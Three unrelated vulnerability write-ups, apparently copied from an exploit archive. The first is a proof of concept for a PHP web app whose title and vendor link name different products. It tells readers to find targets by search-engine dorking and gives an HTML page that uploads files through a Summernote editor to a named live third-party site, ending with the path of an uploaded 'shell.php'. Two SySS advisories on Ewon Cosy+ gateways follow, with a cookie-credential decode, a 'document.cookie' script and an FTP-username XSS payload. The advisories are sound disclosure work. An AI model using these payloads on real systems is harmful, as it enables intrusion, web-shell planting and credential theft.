<pre><code>=============================================================================================================================================<br />| # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected item : admin_class.php<br /><br /> $data .= ", content = '".htmlentities(str_replace("'","&#x2019;",$content))."' ";<br /> if(!empty($_FILES['cover']['tmp_name'])){<br /> $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));<br /> $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);<br /> $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';<br /> $hostName = $_SERVER['HTTP_HOST'];<br /> $path =explode('/',$_SERVER['PHP_SELF']);<br /> $currentPath = '/'.$path[1]; <br /> if($move){<br /> $data .= ", cover_img='$fname' ";<br /> }<br /> }<br /> <br />[+] Line 27 : Set your target url.<br /><br />[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.<br /><br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Manage About Page</title><br /> <!-- Include Summernote CSS and jQuery --><br /> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"><br /> <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet"><br /> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script><br /> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script><br /> <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script><br /></head><br /><body><br /> <div class="container mt-5"><br /> <div class="col-lg-12"><br /> <div class="card card-outline card-primary"><br /> <div class="card-body"><br /> <form action="" id="manage-about"><br /> <div class="form-group"><br /> <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control"><br /> <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p><br /> </textarea><br /> </div><br /> </form><br /> </div><br /> <div class="card-footer border-top border-info"><br /> <div class="d-flex w-100 justify-content-center align-items-center"><br /> <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /><br /> <script><br /> $(document).ready(function(){<br /> // Initialize Summernote Editor<br /> $('.summernote2').summernote({<br /> height: 300,<br /> toolbar: [<br /> ['style', ['style']],<br /> ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],<br /> ['fontname', ['fontname']],<br /> ['fontsize', ['fontsize']],<br /> ['color', ['color']],<br /> ['para', ['ol', 'ul', 'paragraph', 'height']],<br /> ['table', ['table']],<br /> ['insert', ['link', 'picture']],<br /> ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]<br /> ],<br /> callbacks: {<br /> onImageUpload: function(files) {<br /> saveImg(files[0]); // Handle image upload<br /> }<br /> }<br /> });<br /><br /> // Function to save uploaded image<br /> function saveImg(_file) {<br /> var data = new FormData();<br /> data.append("file", _file);<br /> $.ajax({<br /> data: data,<br /> type: "POST",<br /> url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",<br /> cache: false,<br /> contentType: false,<br /> processData: false,<br /> success: function(resp) {<br /> var image = $('<img>').attr('src', resp);<br /> $('.summernote2').summernote("insertNode", image[0]);<br /> }<br /> });<br /> }<br /> });<br /><br /> // Form Submission<br /> $('#manage-about').submit(function(e) {<br /> e.preventDefault();<br /> start_load(); // Start a loading indicator (you need to define this function)<br /> $.ajax({<br /> url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',<br /> data: new FormData($(this)[0]),<br /> cache: false,<br /> contentType: false,<br /> processData: false,<br /> method: 'POST',<br /> type: 'POST',<br /> success: function(resp) {<br /> if(resp == 1) {<br /> alert_toast('Data successfully saved', "success");<br /> end_load(); // End the loading indicator (you need to define this function)<br /> }<br /> }<br /> });<br /> });<br /><br /> // Optional: Define start_load and end_load functions<br /> function start_load() {<br /> // Add your loading indicator logic here<br /> }<br /><br /> function end_load() {<br /> // Remove your loading indicator logic here<br /> }<br /><br /> function alert_toast(message, type) {<br /> alert(message); // Basic alert. Replace with a better toast notification if needed.<br /> }<br /> </script><br /></body><br /></html><br /><br /><br />[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-017<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Cleartext Storage of Sensitive Information in a Cookie (CWE-315)<br />Risk Level: Low<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-03-27<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33892<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to cleartext storage of the password in a cookie, an attacker with<br />appropriate access is able to retrieve the plaintext administrative<br />password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The credentials used for the basic authentication against the web<br />interface of Cosy+ are stored in the cookie "credentials" after a<br />successful login.<br /><br />An attacker with access to a victim's browser is able to retrieve the<br />administrative password of Cosy+.<br /><br />In addition, the cookie is not secured (no HttpOnly, Secure or<br />SameSite attribute is set). Thus, the credentials could also be extracted<br />in combination with cross-site scripting (XSS) vulnerabilities.<br /><br />Note: During the responsible disclosure process, SySS GmbH became aware of<br />CVE-2015-7928[8], which describes an issue with password autocomplete<br />in Ewon devices. Since this function contains the problematic cookie,<br />this CVE may already describe the insecure cookie. SySS GmbH would therefore<br />like to credit the reporter of CVE-2015-7928, Karn Ganeshen.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. "credentials" cookie value: YWRtOlN1cDNyUzNjcjN0IyM=<br /><br />2. Decoded credentials:<br /> #> echo -n "YWRtOlN1cDNyUzNjcjN0IyM=" | base64 -d<br /> adm:Sup3rS3cr3t##<br /><br />Bonus: accessing the cookie from JavaScript code:<br /><script>alert("Credentials can be access via JavaScript" + document.cookie)</script><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-03-26: Vulnerability discovered<br />2024-03-27: Vulnerability reported to manufacturer<br />2024-04-02: Inquiry about the status<br />2024-04-05: Manufacturer acknowlegded the vulnerability and started the<br /> analysis<br />2024-04-10: Two more vulnerabilities reported to the manufacturer<br /> (SYSS-2024-032 and SYSS-2024-033)<br />2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-15: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-15: Acknowlegded the remediation actions and asked the manufacturer<br /> to assign a CVE ID<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status and letting the manufacturer know that<br /> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-017<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-017.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33892<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33892<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br />[8] CVE-2015-7928<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7928<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4zQACgkQrgyb+PE0<br />i1Oq5hAApN8Ekc20CgEg5KyIFK18sKBPzSA/SeZcSdUOkv8N05riytWxbVFuLBpS<br />LhHH9spxUjn6Sr36JDp5dISCj9rtajrNE/adIiNC9LUhBRIr2h1ogFfh5zKK8N9D<br />m4CXknQ3b2QQctkuhywyKSKjvNnvxj+k6nDIFlTzXdl3e9cEpisaAFr8zt9/jb7d<br />ZBt8HHrEvJRCa5eBK40r0t42xFiWILh98enmLVCM2VOUnaAxz6JXLTunRSXqC6WH<br />SzEOR/G32z+NxNCphPuswlIqfnhoaOFQ7oP2miuGglDdm5yWQX6E+xtp5HUelmkS<br />DyZ6nUPOmr67lOgOUIhtIQp4zRYNiQAvDv70x9k/RCv+VDG4B5qEffFIbq6JgSCW<br />Q+5iQXfDEJwuj0ePIe/wO+svn7C7LOSfvRfjw39GF0gTeKhPi8cNj5S+Jpl3M6pP<br />XWEHcHzhVze9t5CLFgkh4GtmqH4OvWvFxn8d3x5h21eljloobUNZXAWlUYJdb6Ae<br />gNhWD3IKQJyPo/4cyDC5iZS6QtivjyiQUb6aU6vqKWcR7tlnr7jferG00Q3Sz8R2<br />ddC8Vw78j2GvzyCibNhSoKGfjQAOhYgfsH8ktRDQ/zDYguT4cHA++V16MbfXwIv0<br />y3mQqModAAlpqYGVf4783H24kuyP19KewZuj5dSsMTyShIcTkCU=<br />=LXSO<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-016<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Improper Neutralization of Input During Web Page Generation (CWE-79)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-03-27<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33893<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to improper neutralization of input, an unauthenticated attacker<br />is able to inject HTML and JavaScript code into the administrative<br />web interface of the device.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />If login against the FTP service of the Cosy+ fails, the submitted<br />username is saved in a log.<br />This log is included in the Cosy+ web interface without neutralizing<br />the content.<br />As a result, an unauthenticated attacker is able to inject<br />HTML/JavaScript code via the username of an FTP login attempt.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Login attempt against Cosy+ FTP service:<br /> #> ftp "<script src=//x>"@192.168.10.33<br /><br />2. JavaScript is included when visiting the event logs on Cosy+ web<br /> interface (http://192.168.10.33/index.shtm#EVLogsTbl):<br /><br /> <div class="x-grid-cell-inner " style="text-align:left;"><br /> eftp-Close FTP session (User: <script src="//x"><br /> </div"><br /><br />Note:<br /> The FTP username is limited to 16 characters and therefore the<br /> payload length is limited too.<br /> However, exploitation is still possible, e.g. by controlling<br /> DNS responses or using short URLs, e.g. an emoji domain.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-03-26: Vulnerability discovered<br />2024-03-27: Vulnerability reported to manufacturer<br />2024-04-02: Inquiry about the status<br />2024-04-05: Manufacturer acknowlegded the vulnerability and started the<br /> analysis<br />2024-04-10: Two more vulnerabilities reported to the manufacturer<br /> (SYSS-2024-032 and SYSS-2024-033)<br />2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-15: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-15: Acknowlegded the remediation actions and asked the manufacturer<br /> to assign a CVE ID<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status and letting the manufacturer know that<br /> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-016<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-016.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33893<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33893<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4vsACgkQrgyb+PE0<br />i1M+GA//R3tvHZW7B21Kf+8aZcVONuL56yzPOyqEdISB0joFi9yvzGkqCJPYws5t<br />vFojVlZT38COf64ZC2siFQCJrtOzMa+zWT3kpSeBFsNQ60Sx79UaCdQVa6GjpZm/<br />8qSNWtCpOMGmj95FwYaHuZbKxiSifyIjsVteADqiaysWVx7kXapktPSD2KiOBJSp<br />Ycg81WfRS10ELiUWoLZ5GTXhzQKzH0Tsh6h1qNHWy5GkHLwIQKkzicQ5wR1ZRzK4<br />o6k8cJySgAqgJ3gmGU9iUUElppPXj7EFOK7m8q0ny5gQpQfz3dMPxJz5eK8zBazd<br />1c9OjgdZNcgzschhKsl/JX+3YVGQzmNo5rSOIbJS4+7Oe0UcTaggzbgj80GGOakT<br />vLC9GqmgYUsv+yr2Dp10pUg/plySeScDhYlkZ+VN9GDcEVodiKzM6wukj1eDEw0+<br />6CzHKnGvKOa322AVnKF+xdB/c+sDCEaD73S47gt8CfG57J7bcpth3Gf9RkLtLFXC<br />U3yiT7FmY/KH7WZvmnyhsk/Go66aGRy0d1hQl/tzdnBVdDn1IZToymnC/YVDxqxc<br />Q9GsDhkpDOyozgrhUdef64RY5ZOzXcpNJvCM1RxjP65ZMxiPpZ0z/3IuGJ+DUWkM<br />f8Sm21hfsgkq8UmnLtSnDCUyPTxJISTK9lwleYkqodqJrXUlUD0=<br />=HV5Q<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>